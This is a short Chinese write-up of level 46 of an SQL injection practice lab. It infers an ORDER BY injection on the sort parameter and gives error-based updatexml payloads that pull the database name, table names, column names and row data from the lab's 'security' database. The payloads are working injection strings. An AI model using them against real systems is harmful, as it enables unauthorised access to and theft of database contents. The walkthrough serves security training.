sqli注入46关
提示输入sort=?
先输入?sort=1
输入?sort=2
输入?sort=3
由以上三个参数可以得知
在sort=1时时使用第一列排序,在sort=2时时使用第二列排序,在sort=3时时使用第三列排序。所以源码可能采用order by 注入。
由于order by 注入后可接报错注入所以使用报错注入。
查找库名?sort=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+
查找表名?sort=1%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),0x7e),1)--+
查找列名?sort=1%20and%20updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1),0x7e),1)--+
查询内容?sort=1%20and%20updatexml(1,concat(0x7e,(select%20id%20from%20emails%20limit%202,1),0x7e),1)--+
注:通过替换代码中limit后数字即可查看查询到的每项内容。